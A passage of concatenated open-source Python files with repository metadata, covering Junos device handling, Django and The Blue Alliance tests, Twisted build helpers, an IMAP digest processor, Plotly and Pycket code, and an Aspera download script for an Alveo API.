this Device instance.
.. warning:: Experimental.
:param new_property:
name/class pairs that will create resource-managers bound as
instance attributes to this Device instance. See code example above
"""
if len(vargs):
for fn in vargs:
# check for name clashes before binding
if hasattr(self, fn.__name__):
raise ValueError(
"request attribute name %s already exists" %
fn.__name__)
for fn in vargs:
# bind as instance method, majik.
self.__dict__[
fn.__name__] = types.MethodType(
fn,
self,
self.__class__)
return
# first verify that the names do not conflict with
# existing object attribute names
for name in kvargs.keys():
# check for name-clashes before binding
if hasattr(self, name):
raise ValueError(
"requested attribute name %s already exists" %
name)
# now instantiate items and bind to this :Device:
for name, thing in kvargs.items():
new_inst = thing(self)
self.__dict__[name] = new_inst
self._manages.append(name)
# ------------------------------------------------------------------------
# facts
# ------------------------------------------------------------------------
def facts_refresh(self, exception_on_failure=False):
"""
Reload the facts from the Junos device into :attr:`facts` property.
:param bool exception_on_failure: To raise exception or warning when
facts gathering errors out.
"""
for gather in FACT_LIST:
try:
gather(self, self._facts)
except:
if exception_on_failure:
raise
warnings.warn('Facts gathering is incomplete. '
'To know the reason call "dev.facts_refresh(exception_on_failure=True)"', RuntimeWarning)
return
# ------------------------------------------------------------------------
# probe
# ------------------------------------------------------------------------
def probe(self, timeout=5, intvtimeout=1):
"""
Probe the device to determine if the Device can accept a remote
connection.
This method is meant to be called *prior* to :open():
This method will not work with ssh-jumphost environments.
:param int timeout:
The probe will report ``True``/``False`` if the device report
connectivity within this timeout (seconds)
:param int intvtimeout:
Timeout interval on the socket connection. Generally you should not
change this value, but you can if you want to twiddle the frequency
of the socket attempts on the connection
:returns: ``True`` if probe is successful, ``False`` otherwise
"""
start = datetime.datetime.now()
end = start + datetime.timedelta(seconds=timeout)
probe_ok = True
while datetime.datetime.now() < end:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(intvtimeout)
try:
s.connect((self.hostname, self._port))
s.shutdown(socket.SHUT_RDWR)
s.close()
break
except:
time.sleep(1)
pass
else:
elapsed = datetime.datetime.now() - start
probe_ok = False
return probe_ok
# -----------------------------------------------------------------------
# Context Manager
# -----------------------------------------------------------------------
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self._conn.connected and \
not isinstance(exc_val, EzErrors.ConnectError):
self.close()
|
mith1979/ansible_automation
|
applied_python/applied_python/lib/python2.7/site-packages/jnpr/junos/device.py
|
Python
|
apache-2.0
| 30,232
|
# Unit tests for typecast functions in django.db.backends.util
import datetime
import unittest
from django.db.backends import utils as typecasts
from django.utils import six
TEST_CASES = {
'typecast_date': (
('', None),
(None, None),
('2005-08-11', datetime.date(2005, 8, 11)),
('1990-01-01', datetime.date(1990, 1, 1)),
),
'typecast_time': (
('', None),
(None, None),
('0:00:00', datetime.time(0, 0)),
('0:30:00', datetime.time(0, 30)),
('8:50:00', datetime.time(8, 50)),
('08:50:00', datetime.time(8, 50)),
('12:00:00', datetime.time(12, 00)),
('12:30:00', datetime.time(12, 30)),
('13:00:00', datetime.time(13, 00)),
('23:59:00', datetime.time(23, 59)),
('00:00:12', datetime.time(0, 0, 12)),
('00:00:12.5', datetime.time(0, 0, 12, 500000)),
('7:22:13.312', datetime.time(7, 22, 13, 312000)),
),
'typecast_timestamp': (
('', None),
(None, None),
('2005-08-11 0:00:00', datetime.datetime(2005, 8, 11)),
('2005-08-11 0:30:00', datetime.datetime(2005, 8, 11, 0, 30)),
('2005-08-11 8:50:30', datetime.datetime(2005, 8, 11, 8, 50, 30)),
('2005-08-11 8:50:30.123', datetime.datetime(2005, 8, 11, 8, 50, 30, 123000)),
('2005-08-11 8:50:30.9', datetime.datetime(2005, 8, 11, 8, 50, 30, 900000)),
('2005-08-11 8:50:30.312-05', datetime.datetime(2005, 8, 11, 8, 50, 30, 312000)),
('2005-08-11 8:50:30.312+02', datetime.datetime(2005, 8, 11, 8, 50, 30, 312000)),
# ticket 14453
('2010-10-12 15:29:22.063202', datetime.datetime(2010, 10, 12, 15, 29, 22, 63202)),
('2010-10-12 15:29:22.063202-03', datetime.datetime(2010, 10, 12, 15, 29, 22, 63202)),
('2010-10-12 15:29:22.063202+04', datetime.datetime(2010, 10, 12, 15, 29, 22, 63202)),
('2010-10-12 15:29:22.0632021', datetime.datetime(2010, 10, 12, 15, 29, 22, 63202)),
('2010-10-12 15:29:22.0632029', datetime.datetime(2010, 10, 12, 15, 29, 22, 63202)),
),
}
class DBTypeCasts(unittest.TestCase):
def test_typeCasts(self):
for k, v in six.iteritems(TEST_CASES):
for inpt, expected in v:
got = getattr(typecasts, k)(inpt)
self.assertEqual(
got,
expected,
"In %s: %r doesn't match %r. Got %r instead." % (k, inpt, expected, got)
)
|
moreati/django
|
tests/db_typecasts/tests.py
|
Python
|
bsd-3-clause
| 2,490
|
from django.contrib import admin
from organization.models.Organization import Organization
# Register your models here.
admin.register(Organization)
|
arcingio/arcing.io
|
services/cms/organization/admin.py
|
Python
|
mit
| 149
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from pycket import values, values_parameter
from pycket.prims.expose import (expose, expose_val, default, make_procedure, procedure)
from pycket.cont import continuation, loop_label
class W_PlumberFlushHandle(values.W_Object):
_attrs_ = _immutable_fields_ = ["plumber"]
def __init__(self, plumber):
self.plumber = plumber
def get_plumber(self):
return self.plumber
class W_Plumber(values.W_Object):
_attrs_ = ["callbacks", "weak_callbacks"]
def __init__(self, callbacks={}, weak_callbacks={}):
self.callbacks = callbacks # hash table of handles -> callbacks
self.weak_callbacks = weak_callbacks # same, but weak refences
def get_callbacks(self):
return self.callbacks
def get_weak_callbacks(self):
return self.weak_callbacks
def set_callback(self, h, proc):
self.callbacks[h] = proc
def set_weak_callback(self, h, proc):
self.weak_callbacks[h] = proc
def remove_handle(self, handle):
if handle in self.callbacks:
del(self.callbacks[handle])
if handle in self.weak_callbacks:
del(self.weak_callbacks[handle])
current_plumber_param = values_parameter.W_Parameter(W_Plumber())
expose_val("current-plumber", current_plumber_param)
@expose("make-plumber", [])
def make_plumber():
return W_Plumber()
@expose("plumber-add-flush!", [W_Plumber, procedure, default(values.W_Bool, values.w_false)])
def plumber_add_flush_bang(p, proc, is_weak):
# create a new handle
h = W_PlumberFlushHandle(p)
# put the new handle into p's callbacks with the given proc
if is_weak is values.w_true:
p.set_weak_callback(h, proc)
else:
p.set_callback(h, proc)
return h
@continuation
def plumber_flush_loop_cont(handlers_callbacks, index, env, cont, _vals):
from pycket.interpreter import return_value
if index >= len(handlers_callbacks):
return return_value(values.w_void, env, cont)
else:
return plumber_flush_loop(handlers_callbacks, index, env, cont)
@loop_label
def plumber_flush_loop(handlers_callbacks, index, env, cont):
current_h = handlers_callbacks[index][0]
current_proc = handlers_callbacks[index][1]
return current_proc.call([current_h], env, plumber_flush_loop_cont(handlers_callbacks, index + 1, env, cont))
@expose("plumber-flush-all", [W_Plumber], simple=False)
def plumber_flush_all(p, env, cont):
return do_plumber_flush_all(p, env, cont)
def do_plumber_flush_all(p, env, cont):
from pycket.interpreter import return_value
callbacks = p.get_callbacks()
weak_callbacks = p.get_weak_callbacks()
handlers_callbacks = [None]*(len(callbacks) + len(weak_callbacks))
index = 0
for h, proc in callbacks.iteritems():
handlers_callbacks[index] = [h, proc]
index += 1
for h, proc in weak_callbacks.iteritems():
handlers_callbacks[index] = [h, proc]
index += 1
if not handlers_callbacks:
return return_value(values.w_void, env, cont)
return plumber_flush_loop(handlers_callbacks, 0, env, cont)
@expose("plumber-flush-handle-remove!", [W_PlumberFlushHandle])
def plumber_flush_handle_remove_bang(h):
p = h.get_plumber()
# remove the given handle from it's plumber's callbacks
p.remove_handle(h)
return values.w_void
|
pycket/pycket
|
pycket/prims/plumber.py
|
Python
|
mit
| 3,398
|
# -*- test-case-name: twisted.python.test.test_dist -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Distutils convenience functionality.
Don't use this outside of Twisted.
Maintainer: Christopher Armstrong
@var _EXTRA_OPTIONS: These are the actual package names and versions that will
be used by C{extras_require}. This is not passed to setup directly so that
combinations of the packages can be created without the need to copy
package names multiple times.
@var _EXTRAS_REQUIRE: C{extras_require} is a dictionary of items that can be
passed to setup.py to install optional dependencies. For example, to
install the optional dev dependencies one would type::
pip install -e ".[dev]"
This has been supported by setuptools since 0.5a4.
@var _PLATFORM_INDEPENDENT: A list of all optional cross-platform dependencies,
as setuptools version specifiers, used to populate L{_EXTRAS_REQUIRE}.
"""
import os
import platform
import sys
from distutils.command import build_scripts, build_ext
from distutils.errors import CompileError
from setuptools import setup as _setup
from setuptools import Extension
from twisted import copyright
from twisted.python.compat import execfile
STATIC_PACKAGE_METADATA = dict(
name="Twisted",
version=copyright.version,
description="An asynchronous networking framework written in Python",
author="Twisted Matrix Laboratories",
author_email="twisted-python@twistedmatrix.com",
maintainer="Glyph Lefkowitz",
maintainer_email="glyph@twistedmatrix.com",
url="http://twistedmatrix.com/",
license="MIT",
long_description="""\
An extensible framework for Python programming, with special focus
on event-based network programming and multiprotocol integration.
""",
classifiers=[
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
],
)
_EXTRA_OPTIONS = dict(
dev=['twistedchecker >= 0.4.0',
'pyflakes >= 1.0.0',
'twisted-dev-tools >= 0.0.2',
'python-subunit',
'sphinx >= 1.3.1',
'pydoctor >= 15.0.0'],
tls=['pyopenssl >= 0.13',
'service_identity',
'idna >= 0.6'],
conch=['gmpy',
'pyasn1',
'cryptography >= 0.9.1',
'appdirs >= 1.4.0',
],
soap=['soappy'],
serial=['pyserial'],
osx=['pyobjc'],
windows=['pypiwin32']
)
_PLATFORM_INDEPENDENT = (
_EXTRA_OPTIONS['tls'] +
_EXTRA_OPTIONS['conch'] +
_EXTRA_OPTIONS['soap'] +
_EXTRA_OPTIONS['serial']
)
_EXTRAS_REQUIRE = {
'dev': _EXTRA_OPTIONS['dev'],
'tls': _EXTRA_OPTIONS['tls'],
'conch': _EXTRA_OPTIONS['conch'],
'soap': _EXTRA_OPTIONS['soap'],
'serial': _EXTRA_OPTIONS['serial'],
'all_non_platform': _PLATFORM_INDEPENDENT,
'osx_platform': (
_EXTRA_OPTIONS['osx'] + _PLATFORM_INDEPENDENT
),
'windows_platform': (
_EXTRA_OPTIONS['windows'] + _PLATFORM_INDEPENDENT
),
}
class ConditionalExtension(Extension):
"""
An extension module that will only be compiled if certain conditions are
met.
@param condition: A callable of one argument which returns True or False to
indicate whether the extension should be built. The argument is an
instance of L{build_ext_twisted}, which has useful methods for checking
things about the platform.
"""
def __init__(self, *args, **kwargs):
self.condition = kwargs.pop("condition", lambda builder: True)
Extension.__init__(self, *args, **kwargs)
def setup(**kw):
"""
An alternative to distutils' setup() which is specially designed
for Twisted subprojects.
@param conditionalExtensions: Extensions to optionally build.
@type conditionalExtensions: C{list} of L{ConditionalExtension}
"""
return _setup(**get_setup_args(**kw))
def get_setup_args(**kw):
if 'cmdclass' not in kw:
kw['cmdclass'] = {'build_scripts': build_scripts_twisted}
if "conditionalExtensions" in kw:
extensions = kw["conditionalExtensions"]
del kw["conditionalExtensions"]
if 'ext_modules' not in kw:
# This is a workaround for distutils behavior; ext_modules isn't
# actually used by our custom builder. distutils deep-down checks
# to see if there are any ext_modules defined before invoking
# the build_ext command. We need to trigger build_ext regardless
# because it is the thing that does the conditional checks to see
# if it should build any extensions. The reason we have to delay
# the conditional checks until then is that the compiler objects
# are not yet set up when this code is executed.
kw["ext_modules"] = extensions
class my_build_ext(build_ext_twisted):
conditionalExtensions = extensions
kw.setdefault('cmdclass', {})['build_ext'] = my_build_ext
return kw
def getVersion(base):
"""
Extract the version number.
@rtype: str
@returns: The version number of the project, as a string like
"2.0.0".
"""
vfile = os.path.join(base, '_version.py')
ns = {'__name__': 'Nothing to see here'}
execfile(vfile, ns)
return ns['version'].base()
def getExtensions():
"""
Get the C extensions used for Twisted.
"""
extensions = [
ConditionalExtension(
"twisted.test.raiser",
["twisted/test/raiser.c"],
condition=lambda _: _isCPython),
ConditionalExtension(
"twisted.internet.iocpreactor.iocpsupport",
["twisted/internet/iocpreactor/iocpsupport/iocpsupport.c",
"twisted/internet/iocpreactor/iocpsupport/winsock_pointers.c"],
libraries=["ws2_32"],
condition=lambda _: _isCPython and sys.platform == "win32"),
ConditionalExtension(
"twisted.python._sendmsg",
sources=["twisted/python/_sendmsg.c"],
condition=lambda _: sys.platform != "win32"),
ConditionalExtension(
"twisted.runner.portmap",
["twisted/runner/portmap.c"],
condition=lambda builder: builder._check_header("rpc/rpc.h")),
]
return extensions
def getScripts(basedir=''):
"""
Returns a list of scripts for Twisted.
"""
scriptdir = os.path.join(basedir, 'bin')
if not os.path.isdir(scriptdir):
# Probably a project-specific tarball, in which case only this
# project's bins are included in 'bin'
scriptdir = os.path.join(basedir, 'bin')
if not os.path.isdir(scriptdir):
return []
thingies = os.listdir(scriptdir)
for specialExclusion in ['.svn', '_preamble.py', '_preamble.pyc']:
if specialExclusion in thingies:
thingies.remove(specialExclusion)
return list(filter(os.path.isfile,
[os.path.join(scriptdir, x) for x in thingies]))
## Helpers and distutil tweaks
class build_scripts_twisted(build_scripts.build_scripts):
"""
Renames scripts so they end with '.py' on Windows.
"""
def run(self):
build_scripts.build_scripts.run(self)
if not os.name == "nt":
return
for f in os.listdir(self.build_dir):
fpath = os.path.join(self.build_dir, f)
if not fpath.endswith(".py"):
pypath = fpath + ".py"
if os.path.exists(pypath):
os.unlink(pypath)
os.rename(fpath, pypath)
class build_ext_twisted(build_ext.build_ext):
"""
Allow subclasses to easily detect and customize Extensions to
build at install-time.
"""
def prepare_extensions(self):
"""
Prepare the C{self.extensions} attribute (used by
L{build_ext.build_ext}) by checking which extensions in
L{conditionalExtensions} should be built. In addition, if we are
building on NT, define the WIN32 macro to 1.
"""
# always define WIN32 under Windows
if os.name == 'nt':
self.define_macros = [("WIN32", 1)]
else:
self.define_macros = []
# On Solaris 10, we need to define the _XOPEN_SOURCE and
# _XOPEN_SOURCE_EXTENDED macros to build in order to gain access to
# the msg_control, msg_controllen, and msg_flags members in
# sendmsg.c. (according to
# http://stackoverflow.com/questions/1034587). See the documentation
# of X/Open CAE in the standards(5) man page of Solaris.
if sys.platform.startswith('sunos'):
self.define_macros.append(('_XOPEN_SOURCE', 1))
self.define_macros.append(('_XOPEN_SOURCE_EXTENDED', 1))
self.extensions = [x for x in self.conditionalExtensions
if x.condition(self)]
for ext in self.extensions:
ext.define_macros.extend(self.define_macros)
def build_extensions(self):
"""
Check to see which extension modules to build and then build them.
"""
self.prepare_extensions()
build_ext.build_ext.build_extensions(self)
def _remove_conftest(self):
for filename in ("conftest.c", "conftest.o", "conftest.obj"):
try:
os.unlink(filename)
except EnvironmentError:
pass
def _compile_helper(self, content):
conftest = open("conftest.c", "w")
try:
conftest.write(content)
conftest.close()
try:
self.compiler.compile(["conftest.c"], output_dir='')
except CompileError:
return False
return True
finally:
self._remove_conftest()
def _check_header(self, header_name):
"""
Check if the given header can be included by trying to compile a file
that contains only an #include line.
"""
self.compiler.announce("checking for %s ..." % header_name, 0)
return self._compile_helper("#include <%s>\n" % header_name)
def _checkCPython(sys=sys, platform=platform):
"""
Checks if this implementation is CPython.
This uses C{platform.python_implementation}.
This takes C{sys} and C{platform} kwargs that by default use the real
modules. You shouldn't care about these -- they are for testing purposes
only.
@return: C{False} if the implementation is definitely not CPython, C{True}
otherwise.
"""
return platform.python_implementation() == "CPython"
_isCPython = _checkCPython()
|
Architektor/PySnip
|
venv/lib/python2.7/site-packages/twisted/python/dist.py
|
Python
|
gpl-3.0
| 10,777
|
import email
import imaplib
import re
from imapclient import IMAPClient
from utils import Utils
class DigestServer(object):
def __init__(self, server, mid, digest_folder_name):
self.digest_folder_name = digest_folder_name
self.digest_inbox = server
self.previous_message_id = mid
def delete_previous_message(self):
self.digest_inbox.delete_messages([self.previous_message_id])
def append(self, message):
self.digest_inbox.append(self.digest_folder_name, message.encode("utf-8"))
class DigestionProcessor(object):
def __init__(self, notification_folder, digest_folder, digesters,
print_summary, sender_to_implicate, move_unmatched, digest_folder_name):
super(DigestionProcessor, self)
self.digest_folder_name = digest_folder_name
self.digesters = digesters
self.move_unmatched = move_unmatched
self.sender_to_implicate = sender_to_implicate
self.print_summary = print_summary
self.digest_folder = digest_folder
self.notification_folder = notification_folder
def doit(self):
messages = self.notification_folder.search('NOT DELETED')
response = self.notification_folder.fetch(messages, ['FLAGS', 'RFC822.SIZE'])
unmatched_mails = []
to_delete = []
# Loop through email in notification folder
for msgid, data in response.items():
rfc_msgid = self.notification_folder.fetch(msgid, ["INTERNALDATE", "BODY", "RFC822"])[msgid]
rfc822content = rfc_msgid[b'RFC822'].decode('ISO-8859-1')
# Debugging strange transcrpion error?
# Well this catch Exception may need to be commented out
# so that you can see the full (root cause) stack trace
try:
self.process_incoming_notification(msgid, self.digesters, rfc822content, to_delete,
unmatched_mails, self.move_unmatched)
except Exception as e:
modified_mail = re.sub("\nSubject:", "\nSubject: [" + str(e) + "]", rfc822content)
unmatched_mails.append(modified_mail)
# Rewrite emails in the digest folder (the one the end-user actually reads)
for digester in self.digesters:
subj_to_match = 'HEADER Subject "' + digester.matching_digest_subject() + '"'
from_to_match = 'HEADER From "' + digester.matching_digest_sender() + '"'
search_criteria = 'NOT DELETED ' + subj_to_match + " " + from_to_match
try:
messages = self.digest_folder.search(search_criteria)
except imaplib.IMAP4.abort:
messages = self.digest_folder.search(search_criteria)
response = self.digest_folder.fetch(messages, ['FLAGS', 'RFC822.SIZE'])
previously_seen = False
previous_message_id = None
for msgid, data in response.items():
previous_message_id = msgid
previously_seen = '\\Seen' in data[b'FLAGS']
digest_inbox_proxy = DigestServer(self.digest_folder, previous_message_id, self.digest_folder_name)
digester.rewrite_digest_emails(digest_inbox_proxy, previous_message_id is not None, previously_seen,
self.sender_to_implicate)
# Move Unmatched files so the human can see them
for unmatched in unmatched_mails:
# unm = re.sub("\nFrom: .*\r\n", "\nFrom: " + self.sender_to_implicate + "\r\n", unm)
# unm = re.sub("\nTo: .*\r\n", "\nTo: " + self.sender_to_implicate + "\r\n", unm)
# modified_mail = re.sub("\\nSubject:", "\\nSubject: [I:D]", unmatched)
modified_mail = unmatched.replace("\nSubject:", "\nSubject: [I:D]")
# print("UNMATCHED:::")
# print(modified_mail)
# b = bytes(modified_mail, "utf8")
# print("-=-=-=-=-=-=-=-=")
# print(str(b))
try:
self.digest_folder.append(self.digest_folder_name, modified_mail.encode('utf-8'))
except IMAPClient.AbortError as e:
print("Can't move '" + self.get_subject(modified_mail) + "', error:" + str(e))
break
# Delete Originals
self.notification_folder.delete_messages(to_delete)
# Print summary for posterity
if self.print_summary:
for digester in self.digesters:
digester.print_summary()
def get_subject(self, rfc822content):
for line in rfc822content.split("\\n"):
if line.startswith("Subject: "):
return line[len("Subject: "):]
return "[i:d] - unknown subject"
def process_incoming_notification(self, msgid, digesters, rfc822content, to_delete,
unmatched_to_move, move_unmatched):
msg = email.message_from_string(rfc822content)
html_message = Utils.get_decoded_email_body(msg, True)
text_message = Utils.get_decoded_email_body(msg, False)
if type(text_message) is bytes:
text_message = text_message.decode("utf-8")
processed = False
for digester in digesters:
if processed:
break
matching_incoming_headers = digester.matching_incoming_headers()
for matching_header in matching_incoming_headers:
# Note, matching_header contains things like:
# From: .* <jira@apache.org>
# ^ regex!!
# Note2, rfc822content contains everything as a string, including the headers
# ...
# From: "Thomas Neidhart (JIRA)" <jira@apache.org>
# To: <you@example.com>
# Message-ID: <JIRA.12911300.1446902881000.65833.1447445412298@Atlassian.JIRA>
# ...
if re.search(matching_header, rfc822content) is not None or rfc822content.find(matching_header) != -1:
processed = digester.process_new_notification(rfc822content, msg, html_message, text_message)
break
if processed:
to_delete.append(msgid)
else:
if move_unmatched:
unmatched_to_move.append(rfc822content)
to_delete.append(msgid)
else:
print("Unmatched email from: " + msg['From'].strip() + ", subject: " + msg['Subject'].strip())
|
paul-hammant/imapdigester
|
digesters/digestion_processor.py
|
Python
|
mit
| 6,530
|
import re
from typing import List
from urllib.parse import urlparse
import pytest
from bs4 import BeautifulSoup
from google.appengine.ext import ndb
from werkzeug.test import Client
from backend.common.consts.account_permission import AccountPermission
from backend.common.consts.media_type import MediaType
from backend.common.consts.suggestion_state import SuggestionState
from backend.common.models.media import Media
from backend.common.models.suggestion import Suggestion
from backend.common.models.team import Team
from backend.common.suggestions.suggestion_creator import (
SuggestionCreationStatus,
SuggestionCreator,
)
@pytest.fixture
def login_user_with_permission(login_user):
login_user.permissions = [AccountPermission.REVIEW_MEDIA]
return login_user
def get_suggestion_queue(web_client: Client) -> List[str]:
response = web_client.get("/suggest/team/media/review")
assert response.status_code == 200
soup = BeautifulSoup(response.data, "html.parser")
review_form = soup.find(id="review_media")
assert review_form is not None
suggestions = review_form.find_all(class_="suggestion-item")
queue = []
for suggestion in suggestions:
accept_button = suggestion.find(
"input",
attrs={
"name": re.compile("accept_reject-.*"),
"value": re.compile("accept::.*"),
},
)
assert accept_button is not None
reject_button = suggestion.find(
"input",
attrs={
"name": re.compile("accept_reject-.*"),
"value": re.compile("reject::.*"),
},
)
assert reject_button is not None
year = suggestion.find("input", attrs={"name": re.compile("year-.*")})
assert year is not None
queue.append(accept_button["value"].split("::")[1])
return queue
def createSuggestion(logged_in_user) -> str:
status = SuggestionCreator.createTeamMediaSuggestion(
logged_in_user.account_key, "http://imgur.com/foobar", "frc1124", "2016"
)
assert status[0] == SuggestionCreationStatus.SUCCESS
return Suggestion.render_media_key_name(2016, "team", "frc1124", "imgur", "foobar")
def test_login_redirect(web_client: Client) -> None:
response = web_client.get("/suggest/team/media/review")
assert response.status_code == 302
assert urlparse(response.headers["Location"]).path == "/account/login"
def test_no_permissions(login_user, web_client: Client) -> None:
response = web_client.get("/suggest/team/media/review")
assert response.status_code == 401
def test_nothing_to_review(login_user_with_permission, web_client: Client) -> None:
queue = get_suggestion_queue(web_client)
assert queue == []
def test_accept_suggestion(
login_user_with_permission,
ndb_stub,
web_client: Client,
taskqueue_stub,
) -> None:
suggestion_id = createSuggestion(login_user_with_permission)
queue = get_suggestion_queue(web_client)
assert queue == [suggestion_id]
response = web_client.post(
"/suggest/team/media/review",
data={
f"accept_reject-{suggestion_id}": f"accept::{suggestion_id}",
},
follow_redirects=True,
)
assert response.status_code == 200
suggestion = Suggestion.get_by_id(suggestion_id)
assert suggestion is not None
assert suggestion.review_state == SuggestionState.REVIEW_ACCEPTED
media = Media.get_by_id(Media.render_key_name(MediaType.IMGUR, "foobar"))
assert media is not None
assert media.year == 2016
assert media.foreign_key == "foobar"
assert media.media_type_enum == MediaType.IMGUR
assert ndb.Key(Team, "frc1124") in media.references
assert media.preferred_references == []
def test_accept_suggestion_change_year(
login_user_with_permission,
ndb_stub,
web_client: Client,
taskqueue_stub,
) -> None:
suggestion_id = createSuggestion(login_user_with_permission)
queue = get_suggestion_queue(web_client)
assert queue == [suggestion_id]
response = web_client.post(
"/suggest/team/media/review",
data={
f"accept_reject-{suggestion_id}": f"accept::{suggestion_id}",
f"year-{suggestion_id}": "2017",
},
follow_redirects=True,
)
assert response.status_code == 200
suggestion = Suggestion.get_by_id(suggestion_id)
assert suggestion is not None
assert suggestion.review_state == SuggestionState.REVIEW_ACCEPTED
media = Media.get_by_id(Media.render_key_name(MediaType.IMGUR, "foobar"))
assert media is not None
assert media.year == 2017
assert media.foreign_key == "foobar"
assert media.media_type_enum == MediaType.IMGUR
assert ndb.Key(Team, "frc1124") in media.references
assert media.preferred_references == []
def test_accept_suggestion_as_preferred(
login_user_with_permission,
ndb_stub,
web_client: Client,
taskqueue_stub,
) -> None:
suggestion_id = createSuggestion(login_user_with_permission)
queue = get_suggestion_queue(web_client)
assert queue == [suggestion_id]
response = web_client.post(
"/suggest/team/media/review",
data={
f"accept_reject-{suggestion_id}": f"accept::{suggestion_id}",
"preferred_keys[]": [f"preferred::{suggestion_id}"],
},
follow_redirects=True,
)
assert response.status_code == 200
suggestion = Suggestion.get_by_id(suggestion_id)
assert suggestion is not None
assert suggestion.review_state == SuggestionState.REVIEW_ACCEPTED
media = Media.get_by_id(Media.render_key_name(MediaType.IMGUR, "foobar"))
assert media is not None
assert media.year == 2016
assert media.foreign_key == "foobar"
assert media.media_type_enum == MediaType.IMGUR
assert ndb.Key(Team, "frc1124") in media.references
assert ndb.Key(Team, "frc1124") in media.preferred_references
def test_accept_suggestion_as_preferred_and_replace(
login_user_with_permission,
ndb_stub,
web_client: Client,
taskqueue_stub,
) -> None:
# Create an existing preferred media
existing_preferred = Media(
id=Media.render_key_name(MediaType.IMGUR, "baz"),
foreign_key="baz",
media_type_enum=MediaType.IMGUR,
year=2016,
preferred_references=[ndb.Key(Team, "frc1124")],
)
existing_preferred.put()
suggestion_id = createSuggestion(login_user_with_permission)
queue = get_suggestion_queue(web_client)
assert queue == [suggestion_id]
response = web_client.post(
"/suggest/team/media/review",
data={
f"accept_reject-{suggestion_id}": f"accept::{suggestion_id}",
"preferred_keys[]": [f"preferred::{suggestion_id}"],
f"replace-preferred-{suggestion_id}": existing_preferred.key_name,
},
follow_redirects=True,
)
assert response.status_code == 200
suggestion = Suggestion.get_by_id(suggestion_id)
assert suggestion is not None
assert suggestion.review_state == SuggestionState.REVIEW_ACCEPTED
media = Media.get_by_id(Media.render_key_name(MediaType.IMGUR, "foobar"))
assert media is not None
assert media.year == 2016
assert media.foreign_key == "foobar"
assert media.media_type_enum == MediaType.IMGUR
assert ndb.Key(Team, "frc1124") in media.references
assert ndb.Key(Team, "frc1124") in media.preferred_references
old_preferred_media = Media.get_by_id(existing_preferred.key_name)
assert old_preferred_media is not None
assert ndb.Key(Team, "frc1124") not in old_preferred_media.preferred_references
def test_reject_suggestion(
login_user_with_permission, ndb_stub, web_client: Client
) -> None:
suggestion_id = createSuggestion(login_user_with_permission)
queue = get_suggestion_queue(web_client)
assert queue == [suggestion_id]
response = web_client.post(
"/suggest/team/media/review",
data={
f"accept_reject-{suggestion_id}": f"reject::{suggestion_id}",
},
follow_redirects=True,
)
assert response.status_code == 200
suggestion = Suggestion.get_by_id(suggestion_id)
assert suggestion is not None
assert suggestion.review_state == SuggestionState.REVIEW_REJECTED
# Verify no medias are created
medias = Media.query().fetch()
assert medias == []
|
the-blue-alliance/the-blue-alliance
|
src/backend/web/handlers/suggestions/tests/suggest_team_media_review_controller_test.py
|
Python
|
mit
| 8,438
|
import _plotly_utils.basevalidators
class ValueValidator(_plotly_utils.basevalidators.DataArrayValidator):
def __init__(self, plotly_name="value", parent_name="isosurface", **kwargs):
super(ValueValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc+clearAxisTypes"),
**kwargs
)
|
plotly/plotly.py
|
packages/python/plotly/plotly/validators/isosurface/_value.py
|
Python
|
mit
| 411
|
'''
HCSvLab Aspera download python script
Sample usage:
python aspera_download.py --key API_KEY --item_list_id 34 --destination ~/Downloads
Be sure to fill in API_URL, ASCP_COMMAND and ASCP_KEY to the correct values on your machine
API_URL: Alveo host you are using; QA URL, Staging URL etc.
ASCP_COMMAND: link to the ascp binary, differs on different systems
ASCP_KEY: link to the openssh key that comes with the aspera connect plugin
'''
import os
import argparse
import urllib2
import urllib
import json
import tempfile
import subprocess
API_URL = "https://alveo-qa.intersect.org.au"
ASCP_COMMAND = "ascp"
ASCP_KEY = "~/asperaweb_id_dsa.openssh"
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument('--key', required=True, action="store", type=str, help="Alveo API key")
parser.add_argument('--item_list_id', required=True, action="store", type=int, help="Item list id")
parser.add_argument('--destination', required=True, action="store", type=str, help="Download destination")
args = parser.parse_args()
return args
def perform_transfer(transfer_spec, destination):
spec = json.loads(transfer_spec)["transfer_spec"]
args = [ASCP_COMMAND]
args.extend(["-i", ASCP_KEY])
args.extend(["-O", str(spec["fasp_port"])])
args.extend(["-P", str(spec["ssh_port"])])
args.extend(["-l", str(spec["target_rate_kbps"])])
args.extend(["-y", "1"])
args.extend(["-t", str(spec["http_fallback_port"])])
args.extend(["--policy", spec["rate_policy"]])
args.extend(["--mode", "RECV"])
args.extend(["--host", spec["remote_host"]])
args.extend(["--user", spec["remote_user"]])
with tempfile.NamedTemporaryFile(delete=False) as temp:
for path in spec["paths"]:
temp.write(path["source"] + "\n")
temp.write(path["destination"] + "\n")
args.extend(["--file-pair-list", temp.name])
args.append(destination)
# print(args)
token = spec["token"]
# print(token)
env = os.environ.copy()
env["ASPERA_SCP_TOKEN"] = token
print("export ASPERA_SCP_TOKEN=" + token)
print(" ".join(args))
subprocess.call(" ".join(args), env=env, shell=True)
def perform_api_download(key, item_list_id, destination):
headers = {'X-API-KEY': key, 'Accept': 'application/json'}
url = API_URL + '/item_lists/' + str(item_list_id) + '/aspera_transfer_spec'
req = urllib2.Request(url, data={}, headers=headers)
try:
opener = urllib2.build_opener(urllib2.HTTPHandler())
response = opener.open(req)
except urllib2.HTTPError as err:
raise APIError(err.code, err.reason, "Error accessing API")
transfer_spec = response.read()
perform_transfer(transfer_spec, destination)
if __name__ == '__main__':
args = get_arguments()
perform_api_download(args.key, args.item_list_id, args.destination)
|
IntersectAustralia/hcsvlab
|
script/aspera_download.py
|
Python
|
gpl-3.0
| 2,801
|
"""
_____________________________________________
___ < trtl - TwistedBot REPL for Testing Libraries >_
//_\\\\ _ ---------------------------------------------
/_|_|_('> /
" "
"""
import os
import sys
import traceback
import readline
import re
regex = re.compile("\x03(?:\d{1,2}(?:,\d{1,2})?)?", re.UNICODE)
sys.path.append("./modules/")
TO_LOAD = [filename[:-3] for dirname, dirnames, filenames in os.walk('./modules') for filename in filenames if filename[-3:] == ".py"]
MODULES = {}
